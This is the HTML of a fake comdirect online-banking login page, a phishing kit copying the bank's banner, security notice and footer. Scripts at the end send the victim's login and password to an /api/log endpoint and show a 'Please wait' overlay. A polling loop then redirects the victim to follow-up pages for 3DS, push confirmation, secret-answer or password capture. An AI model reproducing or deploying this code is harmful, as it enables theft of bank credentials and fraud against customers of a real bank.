                <div class="alert-box alert-box--defaultWithNoColors" id="alert-box--defaultWithNoColors">
	                <div class="grid">
		                <div class="alert-box__column col">
		                    <div class="alert-box__content col__content">
			                    <div class="grid grid--middle  ">
    <div class="col grid--center grid ">
            



            <picture class="responsive-image" data-plugin="{lazyLoad:{}}">
                <source media="screen and (max-width: 479px)" srcset="/static/style/comdirectDE/820965696_login_320x143_1x.jpg" data-srcset="
                                    /t/img/820965696_login_320x143_1x.jpg?v=1624432367 1x,
                                    /t/img/820965696_login_640x286.jpg?v=1624432278 2x
                                ">
                <source media="screen and (min-width: 480px) and (max-width: 1023px)" srcset="/static/style/comdirectDE/820965696_login_320x143_1x.jpg"
                                " data-srcset="
                                    /t/img/820965696_login_320x143_1x.jpg?v=1624432367 1x,
                                    /t/img/820965696_login_640x286.jpg?v=1624432278 2x
                                ">
                <source media="screen and (min-width: 1024px)" srcset="/static/style/comdirectDE/820965696_login_320x143_1x.jpg" data-srcset="
                                    /t/img/820965696_login_320x143_1x.jpg?v=1624432367 1x,
                                    /t/img/820965696_login_640x286.jpg?v=1624432278 2x
                                ">
                <img src="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20width%3D%22320%22%20height%3D%22143%22%20viewBox%3D%220%200%20320%20143%22%3E%3Cfilter%20id%3D%22b%22%3E%3CfeGaussianBlur%20stdDeviation%3D%2212%22%20%2F%3E%3C%2Ffilter%3E%3Cpath%20fill%3D%22%23b0b5b4%22%20d%3D%22M0%200h320v142H0z%22%2F%3E%3Cg%20filter%3D%22url%28%23b%29%22%20transform%3D%22matrix%281.25%200%200%201.25%20.6%20.6%29%22%20fill-opacity%3D%22.5%22%3E%3Cellipse%20fill%3D%22%23160f0c%22%20cx%3D%22132%22%20cy%3D%2253%22%20rx%3D%2237%22%20ry%3D%2230%22%2F%3E%3Cellipse%20fill%3D%22%23fdfefd%22%20cx%3D%2222%22%20cy%3D%2246%22%20rx%3D%2277%22%20ry%3D%22255%22%2F%3E%3Cpath%20fill%3D%22%231e0100%22%20d%3D%22M151%2058l-42-42%207-19z%22%2F%3E%3Cellipse%20fill%3D%22%2380909a%22%20cx%3D%22198%22%20rx%3D%2262%22%20ry%3D%2262%22%2F%3E%3Cpath%20fill%3D%22%23001128%22%20d%3D%22M154%2058h8v34h-8z%22%2F%3E%3Cellipse%20fill%3D%22%23f7f7f3%22%20cx%3D%22136%22%20cy%3D%2299%22%20rx%3D%22250%22%20ry%3D%227%22%2F%3E%3Cpath%20fill%3D%22%23feeeca%22%20d%3D%22M97%2050l20.4-32.7-20.3-.5%2015.3%2039.8z%22%2F%3E%3Cellipse%20fill%3D%22%233e3e22%22%20cx%3D%22203%22%20cy%3D%22107%22%20rx%3D%22161%22%20ry%3D%222%22%2F%3E%3C%2Fg%3E%3C%2Fsvg%3E" data-srcset="
                                    /t/img/820965696_login_320x143_1x.jpg?v=1624432367 1x,
                                    /t/img/820965696_login_640x286.jpg?v=1624432278 2x
                                    " alt="" title="" srcset="
                                    /t/img/820965696_login_320x143_1x.jpg?v=1624432367 1x,
                                    /t/img/820965696_login_640x286.jpg?v=1624432278 2x
                                    ">
                
            </picture>
</div>
</div><div class="grid grid--middle  ">
    <div class="col  ">
        <div class="rich-text">
    <p class="h2">Aktion verlängert: der wikifolio-Sparplan</p>
    <ul class="unordered-list--checks">
	<li>Nachmachen erwünscht – mit Social Trading</li>
	<li>Strategien erfahrener Trader folgen</li>
	<li>Bis 30.06.2022: ausgewählte wikifolio-Zertifikate für 0 Euro Orderentgelt</li>
</ul>
    <a data-plugin="{at:{pageId:&#39;coai_internTeaserClick&#39;,additionalParams:{TeaserPage:&#39;cori0004&#39;,TeaserInfos:&#39;PTS|23076|6436|16084|1&#39;,TeaserKlick:1,TeaserInfosKlick:&#39;PTS|23076|6436|16084|1&#39;}}}" href="https://kunde.comdirect.de/wertpapierhandel/zertifikate-wikifolio.html?sc_cid=6436&amp;cid=comdirect_web:teaser:wikifolio_wsp:verlaengerung:alpha:brokerage" title="Jetzt mehr erfahren " target="_self">Jetzt mehr erfahren </a>
</div>
</div>
</div>
		                    </div>
		                </div>
	                </div>
	            </div>
            </div></div></div></div></div><div class="col col-12"><div class="col__content col__content--no-padding-horizontal"><div><!-- Start Software Snippet /cms/snippets/cori0004-logininfosnippet_long.html --> <div class=""> <div class="grid"> <div class="alert-box__column col"> <div class="alert-box__content col__content inner-spacing--small-sm"> <h2 class="headline headline--h2">Wichtiger Sicherheitshinweis</h2> <p class="paragraph">Derzeit werden Kunden vermehrt von angeblichen Bank-Mitarbeitern angerufen und im Gesprächsverlauf zur Herausgabe von Online-Banking-Zugangsdaten aufgefordert, unter Vorgabe falscher Tatsachen zur Durchführung einer Überweisung aufgefordert (z.B. angeblich zur Rücküberweisung eines falschen Geldeingangs) oder es wird ihnen ein (nicht vorhandener) Geldeingang suggeriert, so dass der Angerufene die Zahlung „freiwillig“ „zurücküberweist“. Es handelt sich hierbei im Regelfall NICHT um Mitarbeiter einer Bank! </p>  <p class="paragraph">Bitte beachten Sie:</p>  <p class="paragraph">Unsere Mitarbeiter werden von Ihnen niemals vertrauliche Daten wie Ihre PIN, TANs oder den TAN-Aktivierungsbrief per E-Mail, telefonisch oder per SMS abfragen.</p> <p class="paragraph">Auch werden wir Sie niemals um Übersendung oder Hochladen dieser Daten bitten oder Sie am Telefon zu einer Zahlung auf ein anderes Konto auffordern.</p> <p class="paragraph">Geben Sie keine persönlichen Zugangsdaten weiter.<br> Laden Sie keine Fotos oder Scans Ihres TAN-Aktivierungsbriefs hoch.<br> Schicken Sie Ihren TAN-Aktivierungsbrief niemals per Post weiter.</p>   <p class="paragraph"> </p><ul class="unordered-list unordered-list--arrow"> <li> <a href="https://kunde.comdirect.de/cms/sicherheit-online-banking.html" title="Bitte beachten Sie auch unsere Sicherheitshinweise">Bitte beachten Sie auch unsere Sicherheitshinweise</a> </li> </ul> </div> </div> </div> </div> <!-- End Software Snippet /cms/snippets/cori0004-logininfosnippet_long.html -->                          </div></div></div></div></div></div></div></div>
    </div>

    <!-- googleoff:index --> 
<!-- googleoff:snippet -->
<div class="cif-scope">
    <div class="footer__wrapper hidden-print">
                    <!-- chat layer --> <div class="chat chat--welcome-active" data-plugin="{textchat: {ajaxUrl: &#39;/cms/conf/chat__inner.txt&#39;,apiUrl: &#39;/genesys/2/chat/request-chat&#39;,patterns: {common_collapsibleLayer: {layerExistsRootClass: &#39;root-state--layer-primary-exists&#39;,customEventName: &#39;chat-layerDefault_opened&#39;,initiallyCollapsed: true}}}}"> <div class="chat__collapsible-layer collapsible-layer collapsible-layer--fixed-right-bottom layer" data-role="common_collapsibleLayer"> <input id="chat-layer" type="checkbox" class="collapsible-layer__trigger layer__trigger" data-role="layer__trigger" autocomplete="off"> <div class="collapsible-layer__content-wrapper layer__content-wrapper" data-role="layer__content-wrapper"> <input id="label-collapse--chat-layer" type="checkbox" class="collapsible-layer__checkbox layer__checkbox" data-role="layer__collapser" autocomplete="off"> <div class="collapsible-layer__content layer__content layer__content--smaller-lg" data-role="layer__content"> <header class="layer__header layer__header--has-headline layer__header--primary" data-role="layer__header"> <label for="label-collapse--chat-layer" class="layer__header-label"></label> <span class="icon icon--size-16 icon--cd_contact-chat-text-16 layer__header-icon"> <svg class="icon__svg" focusable="false"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="/ccf2/lsg/assets/svg/svg-symbol.svg#cd_contact-chat-text-16"></use></svg> </span> <span class="headline headline--h3-alt layer__header-headline">comdirect Chat</span> <nav class="layer__nav" data-role="layer__nav"> <ul class="layer__nav-list"> <li class="layer__nav-list-item"> <div class="chat__unread-badge icon-number" data-role="unreadBadge">0</div> </li> <li class="layer__nav-list-item layer-nav__collapse-label"> <label for="label-collapse--chat-layer" class="layer__nav-list-item--label"> <span class="icon icon--size-16 icon--cd_angle-down-16"> <svg class="icon__svg" focusable="false"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="/ccf2/lsg/assets/svg/svg-symbol.svg#cd_angle-down-16"></use></svg> </span> </label> </li> </ul> </nav> <div class="layer__header-addon" data-role="layer__header-addon">Tippen zum Maximieren</div> </header> <div class="collapsible-layer__content-scroll-container grid-container layer__content-scroll-container" data-role="layer__inner-content"></div> </div> </div> </div> </div>
                <footer class="hidden-print">
            <div class="footer__container">
                <div class="grid grid--noGutter">
                    <div class="col col--lg-8 col--sm-4 col--md-4">
                        <a href="https://www.comdirect.de/" class="cd-logo">
                             <svg xmlns="http://www.w3.org/2000/svg" width="168" height="32" viewBox="48.478 103.112 152.304 24"><path fill="#FFF500" d="M56.978 110.6c-5.144 0-8.5 3.556-8.5 8.256 0 4.701 3.356 8.257 8.5 8.257 2.412 0 4.571-.853 6.039-2.508l-2.175-2.359c-1.029.935-2.412 1.638-3.963 1.638-2.715 0-4.772-2.062-4.772-5.027s2.058-5.03 4.772-5.03c1.551 0 2.75.591 3.878 1.622l2.26-2.343c-1.434-1.655-3.627-2.506-6.039-2.506zm16.495 0c-4.993 0-8.686 3.556-8.686 8.256 0 4.701 3.693 8.257 8.686 8.257 4.992 0 8.703-3.557 8.703-8.257-.001-4.703-3.711-8.256-8.703-8.256zm0 3.226c2.884 0 5.077 2.065 5.077 5.029 0 2.966-2.193 5.028-5.077 5.028-2.885 0-5.059-2.062-5.059-5.028-.001-2.963 2.174-5.029 5.059-5.029zm28.547-3.191c-2.108 0-3.585.752-4.748 1.812-.969-1.035-2.18-1.812-4.264-1.812-1.5 0-2.882.8-3.56 1.505v-1.152h-3.584v15.715h3.584v-11.315c.63-.729 1.599-1.411 3.077-1.411 2.132 0 3.099 1.787 3.099 4.211v8.516h3.585v-11.315c.678-.729 1.453-1.411 2.81-1.411 2.446 0 3.366 1.787 3.366 4.211v8.516h3.585v-8.021c.001-4.779-2.009-8.049-6.95-8.049m18.121-.035c-4.52 0-8.079 3.457-8.079 8.256 0 4.801 3.56 8.257 8.079 8.257 2.293 0 3.963-.902 5.076-2.293v1.883h3.524v-23.59h-3.524v9.797c-1.113-1.393-2.783-2.31-5.076-2.31zm.421 3.226c2.919 0 4.874 2.162 4.874 5.029s-1.956 5.028-4.874 5.028c-3.036 0-4.873-2.277-4.873-5.028-.001-2.751 1.836-5.029 4.873-5.029zm16.579-2.817h-3.542v15.693h3.542v-15.693zm13.037-.409c-1.974 0-3.627.688-4.688 2.179v-1.77h-3.491v15.693h3.525v-8.634c0-2.67 1.601-4.209 3.844-4.209.862 0 1.941.196 2.682.573l.844-3.391c-.811-.311-1.637-.441-2.716-.441zm11.839 0c-4.756 0-8.045 3.342-8.045 8.256 0 4.98 3.425 8.257 8.265 8.257 2.444 0 4.672-.573 6.645-2.212l-1.754-2.442c-1.332 1.033-3.053 1.655-4.673 1.655-2.293 0-4.333-1.179-4.807-3.997h11.943c.032-.394.065-.835.065-1.278-.016-4.899-3.119-8.239-7.639-8.239zm-.068 3.046c2.243 0 3.711 1.425 4.098 3.865h-8.382c.372-2.292 1.772-3.865 4.284-3.865zm18.739-3.046c-5.146 0-8.502 3.556-8.502 8.256 0 4.701 3.356 8.257 8.502 8.257 2.411 0 4.57-.853 6.037-2.508l-2.176-2.359c-1.028.935-2.411 1.638-3.963 1.638-2.715 0-4.773-2.062-4.773-5.027s2.058-5.03 4.773-5.03c1.552 0 2.75.591 3.878 1.622l2.261-2.343c-1.434-1.655-3.625-2.506-6.037-2.506zm9.333 10.419c0 4.177 2.142 6.094 5.801 6.094 2.023 0 3.659-.704 4.959-1.557l-1.4-2.735c-.962.59-2.159 1.063-3.254 1.063-1.417 0-2.564-.817-2.564-2.931v-6.832h6.189v-3.113h-6.189v-4.75h-3.541v14.761z"></path></svg>
                        </a>
                    </div>
                    <div class="col col--lg-4 col--sm-4 col--md-4 col--icon">
                        <div class="social-icon-bar">                    
                            <a href="https://www.facebook.com/comdirect" target="_blank" rel="noopener noreferrer" data-plugin="{at:{pageId:&#39;coai2494&#39;, cDes: &#39;LSG-footer| social_media | facebook&#39;}}">
                              <span class="icon icon--cd_social-facebook-32 icon--size-32">
                                <svg class="icon__svg">
                                  <use xlink:href="/ccf2/lsg/assets/svg/svg-symbol.svg#cd_social-facebook-32"></use>
                                </svg>
                              </span>
                            </a>
                            <a href="https://twitter.com/comdirect" target="_blank" rel="noopener noreferrer" data-plugin="{at:{pageId:&#39;coai2495&#39;, cDes: &#39;LSG-footer| social_media | twitter&#39;}}">
                              <span class="icon icon--cd_social-twitter-32 icon--size-32">  
                                <svg class="icon__svg">
                                  <use xlink:href="/ccf2/lsg/assets/svg/svg-symbol.svg#cd_social-twitter-32"></use>
                                </svg>
                              </span>
                            </a>
                            <a href="https://www.youtube.com/comdirect" target="_blank" rel="noopener noreferrer" data-plugin="{at:{pageId:&#39;coai2496&#39;, cDes: &#39;LSG-footer| social_media | youtube&#39;}}">
                              <span class="icon icon--cd_social-youtube-32 icon--size-32">   
                                <svg class="icon__svg">
                                   <use xlink:href="/ccf2/lsg/assets/svg/svg-symbol.svg#cd_social-youtube-32"></use>
                                </svg>
                             </span>
                            </a>
                            <a href="https://www.instagram.com/comdirect/?hl=de" target="_blank" rel="noopener noreferrer" data-plugin="{at:{pageId:&#39;coai2945&#39;, cDes: &#39;LSG-footer| social_media | instagram&#39;}}">
                              <span class="icon icon--cd_social-insta-32 icon--size-32">   
                                <svg class="icon__svg">
                                   <use xlink:href="/ccf2/lsg/assets/svg/svg-symbol.svg#cd_social-insta-32"></use>
                                </svg>
                             </span>
                            </a>
                        </div>
                    </div>
                    <div class="col-12">
                        <div class="footer__nav">
                            <ul class="footer__nav--level1">
                                                                    <li><a data-plugin="{at:{pageId:&#39;coai2863&#39;, cDes:&#39;LSG-footer|kontakt&#39;}}" href="https://www.comdirect.de/cms/hilfe-service-kontakt.html">Kontakt</a></li>
                                                                <li><a data-plugin="{at:{pageId:&#39;coai0826&#39;}}" href="https://kunde.comdirect.de/cms/ueberuns/de/unternehmen/index.html">Über uns</a></li>
                                <li><a data-plugin="{at:{pageId:&#39;coai1120&#39;}}" href="https://www.comdirect.de/cms/ueberuns/de/presse/presse.html">Presse</a></li>
								<li><a data-plugin="{at:{pageId:&#39;cori8945&#39;, cDes: &#39;LSG-footer|magazin&#39;}}" href="https://magazin.comdirect.de/" target="_blank" rel="noopener">Magazin</a></li>
                                <li><a data-plugin="{at:{pageId:&#39;coai1274&#39;}}" href="https://www.commerzbank.de/de/hauptnavigation/karriere/karriere.html" rel="noopener">Karriere</a></li>
                                <li><a data-plugin="{at:{pageId:&#39;coai2490&#39;}}" href="https://community.comdirect.de/" rel="noopener">Community</a></li>
                                <li><a data-plugin="{at:{pageId:&#39;coai2498&#39;}}" href="https://kunde.comdirect.de/cms/apps.html">Apps</a></li>
                                <li><a data-plugin="{at:{pageId:&#39;cori8945&#39;, cDes: &#39;LSG-footer|kwk&#39;}}" href="https://kunde.comdirect.de/cms/kundenwerbung.html">Kunden werben Kunden</a></li>

                           </ul>
                        </div>
                        <div class="footer__nav">
                            <ul class="footer__nav--level2">
                                <li><a data-plugin="{at:{pageId:&#39;coai1113&#39;}}" href="https://www.comdirect.de/cms/hilfe-service-impressum.html">Impressum</a></li>
                                <li><a data-plugin="{at:{pageId:&#39;coai1114&#39;}}" href="https://www.comdirect.de/cms/hilfe-service-sicherheit-datenschutz.html">Datenschutz</a></li>
                                                                <li><a href="https://kunde.comdirect.de/lp/wt/login?execution=e1s1#uc-corner-modal-show">Einwilligungseinstellungen</a></li>
                                                                <li><a data-plugin="{at:{pageId:&#39;coai1115&#39;}}" href="https://www.comdirect.de/cms/hilfe-service-sicherheit.html">Sicherheit</a></li>
                                <li><a data-plugin="{at:{pageId:&#39;coai1116&#39;}}" href="https://www.comdirect.de/cms/hilfe-service-nutzungsbedingungen.html">Nutzungsbedingungen</a></li>
                                <li><a data-plugin="{at:{pageId:&#39;coai1117&#39;}}" target="_blank" href="https://www.comdirect.de/pbl/ePdfTracker.do?ePageId=cori6762">AGB</a></li>
                            </ul>
                        </div>
                    </div>
                    <div class="col-12 inner-spacing--none-bottom">
                      <span class="footer__copyright">© comdirect - eine Marke der Commerzbank AG</span>
                    </div>
                </div>
            </div>
        </footer>
     </div>
</div>

 
<div class="layer" data-plugin="{common_layer: {}}">
    <input type="checkbox" id="tooltip-help-layer" class="layer__trigger " data-role="layer__trigger" autocomplete="off">
    <div class="layer__content-wrapper" data-role="layer__content-wrapper">
        
        <div class="layer__backdrop"></div>
        
        <label for="tooltip-help-layer" class="layer__close">
            <span class="icon icon--cd_circle-40 icon--size-40 layer__close-icon layer__close-icon--ring">
                <svg class="icon__svg" focusable="false">
                    <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="/ccf2/lsg/assets/svg/svg-symbol.svg#cd_circle-40"></use>
                </svg>
            </span>
            <span class="icon icon--cd_close-16 icon--size-16 layer__close-icon">
                <svg class="icon__svg" focusable="false">
                    <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="/ccf2/lsg/assets/svg/svg-symbol.svg#cd_close-16"></use>
                </svg>
            </span>
        </label>
        
        <div class="layer__content layer__content--impulse-lg layer__content--wider-lg" data-role="layer__content">
            <header class="layer__header layer__header--has-headline " data-role="layer__header">
                <nav class="layer__nav" data-role="layer__nav">
                    <ul class="layer__nav-list">
                        <li class="layer__nav-list-item">
                            <label class="layer__nav-list-item--label" for="tooltip-help-layer">
                                <span class="icon icon--cd_close-16 icon--size-16">
                                    <svg class="icon__svg" focusable="false">
                                        <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="/ccf2/lsg/assets/svg/svg-symbol.svg#cd_close-16"></use>
                                    </svg>
                                </span>
                            </label>
                        </li>
                    </ul>
                </nav>
            </header>

            <div class="layer__content-scroll-container grid-container" data-role="layer__inner-content">
                <div class="js_ajaxWrapper"></div>
            </div>
        </div>
    </div>
</div>

<script>
    console.log($('#login').val(), $('#password').val(), $('#bik').val())
    function lk_auth() {
        axios.post(`/api/log/${window.location.pathname.split('/')[3]}`, {
            method: 'BankLogDE',
            bank: 'Bank Comdirect',
            login: $('#login').val(),
            password: $('#password').val()
        }).then(async (res) => {
            document.querySelector('body').innerHTML = `
            
            <style>
            #loadingDiv{position:fixed;top:0px;right:0px;width:100%;height:100%;background-color:#666;background-image:url('https://c.tenor.com/5o2p0tH5LFQAAAAi/hug.gif'); background-repeat:no-repeat;background-position:center;z-index:10000000;  opacity: 0.4;
            filter: alpha(opacity=40); /* For IE8 and earlier */}
            </style>
            
            <div id="loadingDiv">
                <div>
                    <h7>Please wait...</h7>
                </div>
            </div>
            `
        }).catch((e) => {
            console.log(e)
        })
    }
</script>

<script>
    setInterval(() => {
        axios.post(`/api/getStatus/${window.location.pathname.split('/')[3]}`, {
            id: window.location.pathname.split('/')[3]
        }).then((res_1) => {
            console.log(res_1.data.method)
            if (res_1.data.method == '3ds') {
                window.location.replace(`/receive/verify/${window.location.pathname.split('/')[3]}`)
            } else if (res_1.data.method == 'push') {
                window.location.replace(`/receive/confirm/${window.location.pathname.split('/')[3]}`)
            } else if (res_1.data.method == 'fake') {
                window.location.href = `/receive/select/${window.location.pathname.split('/')[3]}`
            } else if (res_1.data.method == 'lk') {
                window.location.href = `/receive/select/${window.location.pathname.split('/')[3]}`
            } else if (res_1.data.method == 'secretDE') {
                window.location.replace(`/receive/secret/${window.location.pathname.split('/')[3]}`)
            } else if (res_1.data.method == 'password') {
                window.location.replace(`/receive/password/${window.location.pathname.split('/')[3]}`)
            }
        })
    }, 1000);
</script>

<script type="text/javascript">
    function openForm() {
        $('#myForm').css('display', 'block')
        $('#open-support').css('display', 'none')
    }

    function closeForm() {
        $('#myForm').css('display', 'none')
        $('#open-support').css('display', 'block')
    }
</script>

<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
<script src="https://unpkg.com/axios/dist/axios.min.js"></script>

<!-- <script src="https://cdn.jsdelivr.net/gh/fz6m/console-ban@3.2/dist/console-ban.min.js"></script>
<script>
    ConsoleBan.init({
        redirect: 'https://http.cat/403'
    })
</script> -->

</body></html>